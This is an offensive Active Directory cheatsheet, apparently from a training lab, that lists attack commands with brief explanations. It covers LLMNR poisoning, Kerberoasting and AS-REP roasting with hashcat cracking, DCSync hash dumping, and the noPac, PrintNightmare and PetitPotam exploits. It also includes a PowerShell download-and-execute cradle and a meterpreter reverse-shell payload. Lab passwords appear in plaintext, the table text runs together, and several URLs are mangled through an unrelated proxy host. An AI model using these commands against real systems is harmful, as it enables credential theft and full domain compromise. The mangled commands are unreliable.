Cheatsheet - Active Directory Enum
Cheatsheet - Active Directory Enum
Initial Enumeration
Command Description
nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain
name mapping of the target entered from a Linux-based host.
sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -
i option a Linux-based host.
sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR , NBT-NS and MDNS queries on the
interface specified proceeding the -I option and operating in Passive
Analysis mode which is activated using -A . Performed from a Linux-based host
fping -asgq 172.16.5.0/23 Performs a ping sweep on the specified network segment from a Linux-based host.
sudo nmap -v -A -iL hosts.txt -oN Performs an nmap scan that with OS detection, version detection, script scanning,
/home/User/Documents/host-enum and traceroute enabled ( -A ) based on a list of hosts ( hosts.txt ) specified in the
file proceeding -iL . Then outputs the scan results to the file specified after the -
oN option. Performed from a Linux-based host
sudo git clone Uses git to clone the kerbrute tool from a Linux-based host.
https://github.com/ropnop/kerbrute.git
make help Used to list compiling options that are possible with make from a Linux-based host.
sudo make all Used to compile a Kerbrute binary for multiple OS platforms and CPU
architectures.
./kerbrute_linux_amd64 Used to test the chosen complied Kebrute binary from a Linux-based host.
sudo mv kerbrute_linux_amd64 Used to move the Kerbrute binary to a directory can be set to be in a Linux user's
/usr/local/bin/kerbrute path. Making it easier to use the tool.
./kerbrute_linux_amd64 userenum -d Runs the Kerbrute tool to discover usernames in the domain
INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o ( INLANEFREIGHT.LOCAL ) specified proceeding the -d option and the associated
kerb-results domain controller specified proceeding --dc using a wordlist and outputs ( -o ) the
results to a specified file. Performed from a Linux-based host.
LLMNR/NTB-NS Poisoning
Command Description
responder -h Used to display the usage instructions
and various options available
in Responder from a Linux-based host.
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt Uses hashcat to crack NTLMv2 ( -m )
hashes that were captured by responder
and saved in a file ( frond_ntlmv2 ). The
cracking is done based on a specified
wordlist.
Import-Module .\Inveigh.ps1 Using the Import-Module PowerShell
cmd-let to import the Windows-based
tool Inveigh.ps1 .
(Get-Command Invoke-Inveigh).Parameters Used to output many of the options &
functionality available with Invoke-
Inveigh . Peformed from a Windows-
based host.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y Starts Inveigh on a Windows-based
host with LLMNR & NBNS spoofing
enabled and outputs the results to a file.
.\Inveigh.exe Starts the C# implementation
of Inveigh from a Windows-based host.
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get- PowerShell script used to disable NBT-
ChildItem $regkey \|foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NS on a Windows host.
NetbiosOptions -Value 2 -Verbose}
Credentialed Enumeration
Command Description
xfreerdp /u:[email protected] /p:Klmcargo2 Connects to a Windows target using valid credentials. Performed from a
/v:172.16.5.25 Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
users and attempts to discover more users ( --users ) in a target Windows
domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
groups and attempts to discover groups ( --groups ) in a target Windows
domain. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
loggedon-users and attempts to check for a list of logged on users ( --loggedon-users )
on the target Windows host. Performed from a Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -- Authenticates with a Windows target over smb using valid credentials
shares and attempts to discover any smb shares ( --shares ). Performed from a
Linux-based host.
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M Authenticates with a Windows target over smb using valid credentials
spider_plus --share Dev-share and utilizes the CrackMapExec module ( -M ) spider_plus to go
through each readable share ( Dev-share ) and list all readable files. The
results are outputted in JSON . Performed from a Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H Enumerates the target Windows domain using valid credentials and lists
172.16.5.5 shares & permissions available on each within the context of the valid
credentials used and the target Windows host ( -H ). Performed from a
Linux-based host.
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H Enumerates the target Windows domain using valid credentials and
172.16.5.5 -R SYSVOL --dir-only performs a recursive listing ( -R ) of the specified share ( SYSVOL ) and
only outputs a list of directories ( --dir-only ) in the share. Performed
from a Linux-based host.
rpcclient $> queryuser 0x457 Enumerates a target user account in a Windows domain using its
relative identifier ( 0x457 ). Performed from a Linux-based host.
rpcclient $> enumdomusers Discovers user accounts in a target Windows domain and their
associated relative identifiers ( rid ). Performed from a Linux-based host.
psexec.py Impacket tool used to connect to the CLI of a Windows target via
inlanefreight.local/wley:'transporter@4'@172.16.5.125 the ADMIN$ administrative share with valid credentials. Performed from
a Linux-based host.
wmiexec.py Impacket tool used to connect to the CLI of a Windows target
inlanefreight.local/wley:'transporter@4'@172.16.5.5 via WMI with valid credentials. Performed from a Linux-based host.
windapsearch.py -h Used to display the options and functionality of windapsearch.py.
Performed from a Linux-based host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to enumerate the domain admins group ( --da ) using a valid set of
inlanefreight\wley -p transporter@4 --da credentials on a target Windows domain. Performed from a Linux-based
host.
python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to perform a recursive search ( -PU ) for users with nested
inlanefreight\wley -p transporter@4 -PU permissions using valid credentials. Performed from a Linux-based host.
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns Executes the python implementation of BloodHound ( bloodhound.py )
172.16.5.5 -d inlanefreight.local -c all with valid credentials and specifies a name server ( -ns ) and target
Windows domain ( inlanefreight.local ) as well as runs all checks ( -
c all ). Runs using valid credentials. Performed from a Linux-based
host.
Transfering Files
Command Description
sudo python3 -m http.server 8001 Starts a python web server for quick hosting
of files. Performed from a Linux-basd host.
"IEX(New-Object PowerShell one-liner used to download a file
Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" from a web server. Performed from a
Windows-based host.
impacket-smbserver -ip 172.16.5.x -smb2support -username user -password password Starts a impacket SMB server for quick
shared /home/administrator/Downloads/ hosting of a file. Performed from a Windows-
based host.
Kerberoasting
Command Description
sudo python3 -m pip install . Used to install Impacket from inside the directory that
gets cloned to the attack host. Performed from a Linux-
based host.
GetUserSPNs.py -h Impacket tool used to display the options and
functionality of GetUserSPNs.py from a Linux-based
host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday Impacket tool used to get a list of SPNs on the target
Windows domain from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request Impacket tool used to download/request ( -request )
all TGS tickets for offline processing from a Linux-
based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request- Impacket tool used to download/request ( -request-
user sqldev user ) a TGS ticket for a specific user account
( sqldev ) from a Linux-based host.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request- Impacket tool used to download/request a TGS ticket
user sqldev -outputfile sqldev_tgs for a specific user account and write the ticket to a file
( -outputfile sqldev_tgs ) linux-based host.
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force Attempts to crack the Kerberos ( -m 13100 ) ticket hash
( sqldev_tgs ) using hashcat and a wordlist
( rockyou.txt ) from a Linux-based host.
setspn.exe -Q */* Used to enumerate SPNs in a target Windows domain
from a Windows-based host.
Add-Type -AssemblyName System.IdentityModel New-Object PowerShell script used to download/request the TGS
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ticket of a specific user from a Windows-based host.
Command Description
"MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* \| Select-String '^CN' -Context Used to download/request all TGS tickets from a
0,1 \| % { New-Object WIndows-based host.
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList
$_.Context.PostContext[0].Trim() }
mimikatz # base64 /out:true Mimikatz command that ensures TGS tickets are
extracted in base64 format from a Windows-based
host.
kerberos::list /export Mimikatz command used to extract the TGS tickets
from a Windows-based host.
echo "<base64 blob>" \| tr -d \\n Used to prepare the base64 formatted TGS ticket for
cracking from Linux-based host.
cat encoded_file \| base64 -d > sqldev.kirbi Used to output a file ( encoded_file ) into a .kirbi file in
base64 ( base64 -d > sqldev.kirbi ) format from a
Linux-based host.
python2.7 kirbi2john.py sqldev.kirbi Used to extract the Kerberos ticket . This also
creates a file called crack_file from a Linux-based
host.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > Used to modify the crack_file for Hashcat from a
sqldev_tgs_hashcat Linux-based host.
cat sqldev_tgs_hashcat Used to view the prepared hash from a Linux-based
host.
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt Used to crack the prepared Kerberos ticket hash
( sqldev_tgs_hashcat ) using a wordlist
( rockyou.txt ) from a Linux-based host.
Import-Module .\PowerView.ps1 Get-DomainUser * -spn \| select Uses PowerView tool to extract TGS Tickets .
samaccountname Performed from a Windows-based host.
Get-DomainUser -Identity sqldev \| Get-DomainSPNTicket -Format Hashcat PowerView tool used to download/request the TGS
ticket of a specific ticket and automatically format it
for Hashcat from a Windows-based host.
Get-DomainUser * -SPN \| Get-DomainSPNTicket -Format Hashcat \| Export-Csv Exports all TGS tickets to a .CSV file
.\ilfreight_tgs.csv -NoTypeInformation ( ilfreight_tgs.csv ) from a Windows-based host.
cat .\ilfreight_tgs.csv Used to view the contents of the .csv file from a
Windows-based host.
.\Rubeus.exe Used to view the options and functionality possible
with the tool Rubeus . Performed from a Windows-
based host.
.\Rubeus.exe kerberoast /stats Used to check the kerberoast stats ( /stats ) within
the target Windows domain from a Windows-based
host.
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap Used to request/download TGS tickets for accounts
with the admin count set to 1 then formats the output
in an easy to view & crack manner ( /nowrap ) .
Performed from a Windows-based host.
.\Rubeus.exe kerberoast /user:testspn /nowrap Used to request/download a TGS ticket for a specific
user ( /user:testspn ) the formats the output in an
easy to view & crack manner ( /nowrap ). Performed
from a Windows-based host.
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds- PowerView tool used to check the msDS-
supportedencryptiontypes SupportedEncryptionType attribute associated with a
specific user account ( testspn ). Performed from a
Windows-based host.
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt Used to attempt to crack the ticket hash using a
wordlist ( rockyou.txt ) from a Linux-based host .
DCSync
Command Description
Get-DomainUser -Identity adunn \| select PowerView tool used to view the group
samaccountname,objectsid,memberof,useraccountcontrol \|fl membership of a specific user ( adunn ) in a
target Windows domain. Performed from a
Windows-based host.
Command Description
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl Used to create a variable called SID that is set
"DC=inlanefreight,DC=local" -ResolveGUIDs \| ? { ($_.ObjectAceType -match equal to the SID of a user account. Then uses
'Replication-Get')} \| ?{$_.SecurityIdentifier -match $sid} \| select PowerView tool Get-ObjectAcl to check a
AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType \| specific user's replication rights. Performed
fl from a Windows-based host.
secretsdump.py -outputfile inlanefreight_hashes -just-dc Impacket tool sed to extract NTLM hashes from
INLANEFREIGHT/[email protected] -use-vss the NTDS.dit file hosted on a target Domain
Controller ( 172.16.5.5 ) and save the
extracted hashes to an file
( inlanefreight_hashes ). Performed from a
Linux-based host.
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL Uses Mimikatz to perform a dcsync attack
/user:INLANEFREIGHT\administrator from a Windows-based host.
Privileged Access
Command Description
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 - PowerView based tool to used to enumerate the Remote Desktop
GroupName "Remote Desktop Users" Users group on a Windows target ( -ComputerName ACADEMY-EA-MS01 )
from a Windows-based host.
Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 - PowerView based tool to used to enumerate the Remote Management
GroupName "Remote Management Users" Users group on a Windows target ( -ComputerName ACADEMY-EA-MS01 )
from a Windows-based host.
$password = ConvertTo-SecureString "Klmcargo2" - Creates a variable ( $password ) set equal to the password ( Klmcargo2 )
AsPlainText -Force of a user from a Windows-based host.
$cred = new-object Creates a variable ( $cred ) set equal to the username ( forend ) and
System.Management.Automation.PSCredential password ( $password ) of a target domain account from a Windows-
("INLANEFREIGHT\forend", $password) based host.
Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential Uses the PowerShell cmd-let Enter-PSSession to establish a
$cred PowerShell session with a target over the network ( -ComputerName
ACADEMY-EA-DB01 ) from a Windows-based host. Authenticates using
credentials made in the 2 commands shown prior ( $cred & $password ).
evil-winrm -i 10.129.201.234 -u forend Used to establish a PowerShell session with a Windows target from a
Linux-based host using WinRM .
Import-Module .\PowerUpSQL.ps1 Used to import the PowerUpSQL tool.
Get-SQLInstanceDomain PowerUpSQL tool used to enumerate SQL server instances from a
Windows-based host.
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" - PowerUpSQL tool used to connect to connect to a SQL server and query
username "inlanefreight\damundsen" -password "SQL1234!" - the version ( -query 'Select @@version' ) from a Windows-based host.
query 'Select @@version'
mssqlclient.py Impacket tool used to display the functionality and options provided
with mssqlclient.py from a Linux-based host.
mssqlclient.py INLANEFREIGHT/[email protected] - Impacket tool used to connect to a MSSQL server from a Linux-based
windows-auth host.
SQL> help Used to display mssqlclient.py options once connected to a MSSQL
server.
SQL> enable_xp_cmdshell Used to enable xp_cmdshell stored procedure that allows for
executing OS commands via the database from a Linux-based host.
xp_cmdshell whoami /priv Used to enumerate rights on a system using xp_cmdshell .
NoPac
Command Description
sudo git clone https://github.com/Ridter/noPac.git Used to clone a noPac exploit using git. Performed from a Linux-
based host.
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc- Runs scanner.py to check if a target system is vulnerable
ip 172.16.5.5 -use-ldap to noPac / Sam_The_Admin from a Linux-based host.
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip Used to exploit the noPac / Sam_The_Admin vulnerability and gain
172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate a SYSTEM shell ( -shell ). Performed from a Linux-based host.
administrator -use-ldap
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip Used to exploit the noPac / Sam_The_Admin vulnerability and
172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator - perform a DCSync attack against the built-in Administrator
Command Description
use-ldap -dump -just-dc-user INLANEFREIGHT/administrator account on a Domain Controller from a Linux-based host.
PrintNightmare
Command Description
git clone https://github.com/cube0x0/CVE-2021-1675.git Used to clone a PrintNightmare exploit using git from a Linux-based
host.
pip3 uninstall impacket git clone Used to ensure the exploit author's ( cube0x0 ) version of Impacket is
https://github.com/cube0x0/impacket cd impacket python3 installed. This also uninstalls any previous Impacket version on a Linux-
./setup.py install based host.
rpcdump.py @172.16.5.5 \| egrep 'MS-RPRN\|MS-PAR' Used to check if a Windows target has MS-PAR & MSRPRN exposed
from a Linux-based host.
msfvenom -p windows/x64/meterpreter/reverse_tcp Used to generate a DLL payload to be used by the exploit to gain a
LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll shell session. Performed from a Windows-based host.
sudo smbserver.py -smb2support CompData Used to create an SMB server and host a shared folder ( CompData ) at
/path/to/backupscript.dll the specified location on the local linux host. This can be used to host
the DLL payload that the exploit will attempt to download to the host.
Performed from a Linux-based host.
sudo python3 CVE-2021-1675.py inlanefreight.local/<username>: Executes the exploit and specifies the location of the DLL payload.
<password>@172.16.5.5 Performed from a Linux-based host.
'\\10.129.202.111\CompData\backupscript.dll'
PetitPotam
Command Description
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA- Impacket tool used to create an NTLM relay by
CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template specifiying the web enrollment URL for
DomainController the Certificate Authority host. Perfomred
from a Linux-based host.
git clone https://github.com/topotam/PetitPotam.git Used to clone the PetitPotam exploit using git.
Performed from a Linux-based host.
python3 PetitPotam.py 172.16.5.225 172.16.5.5 Used to execute the PetitPotam exploit by
specifying the IP address of the attack host
( 172.16.5.255 ) and the target Domain Controller
( 172.16.5.5 ). Performed from a Linux-based host.
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ Uses gettgtpkinit .py to request a TGT ticket for
-pfx-base64 <base64 certificate> = dc01.ccache the Domain Controller ( dc01.ccache ) from a
Linux-based host.
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY- Impacket tool used to perform a DCSync attack
EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL and retrieve one or all of the NTLM password
hashes from the target Windows domain.
Performed from a Linux-based host.
klist krb5-user command used to view the contents of
the ccache file. Performed from a Linux-based
host.
python /opt/PKINITtools/getnthash.py -key Used to submit TGS requests
70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 using getnthash.py from a Linux-based host.
INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA- Impacket tool used to extract hashes
DC01$"@172.16.5.5 -hashes from NTDS.dit using a DCSync attack and a
aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba captured hash ( -hashes ). Performed from a Linux-
based host.
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 certificate>=/ptt Uses Rubeus to request a TGT and perform
a pass-the-ticket attack using the machine
account ( /user:ACADEMY-EA-DC01$ ) of a Windows
target. Performed from a Windows-based host.
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt Performs a DCSync attack using Mimikatz .
Performed from a Windows-based host.
Miscellaneous Misconfigurations
Command Description
Import-Module .\SecurityAssessment.ps1 Used to import the module Security Assessment.ps1 . Performed from a
Windows-based host.
Get-SpoolStatus -ComputerName ACADEMY-EA- SecurityAssessment.ps1 based tool used to enumerate a Windows target
DC01.INLANEFREIGHT.LOCAL for MS-PRN Printer bug . Performed from a Windows-based host.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 Used to resolve all records in a DNS zone over LDAP from a Linux-based
host.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r Used to resolve unknown records in a DNS zone by performing an A
query ( -r ) from a Linux-based host.
Get-DomainUser * \| Select-Object PowerView tool used to display the description field of select objects
samaccountname,description ( Select-Object ) on a target Windows domain from a Windows-based
host.
Get-DomainUser -UACFilter PASSWD_NOTREQD \| Select-Object PowerView tool used to check for the PASSWD_NOTREQD setting of select
samaccountname,useraccountcontrol objects ( Select-Object ) on a target Windows domain from a Windows-
based host.
ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Used to list the contents of a share hosted on a Windows target from the
context of a currently logged on user. Performed from a Windows-based
host.
ASREPRoasting
Command Description
Get-DomainUser -PreauthNotRequired \| select PowerView based tool used to search for
samaccountname,userprincipalname,useraccountcontrol \| fl the DONT_REQ_PREAUTH value across in user accounts in a target
Windows domain. Performed from a Windows-based host.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat Uses Rubeus to perform an ASEP Roasting attack and formats
the output for Hashcat . Performed from a Windows-based host.
hashcat -m 18200 ilfreight_asrep Uses Hashcat to attempt to crack the captured hash using a
/usr/share/wordlists/rockyou.txt wordlist ( rockyou.txt ). Performed from a Linux-based host.
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 Enumerates users in a target Windows domain and automatically
/opt/jsmith.txt retrieves the AS for any users found that don't require Kerberos pre-
authentication. Performed from a Linux-based host.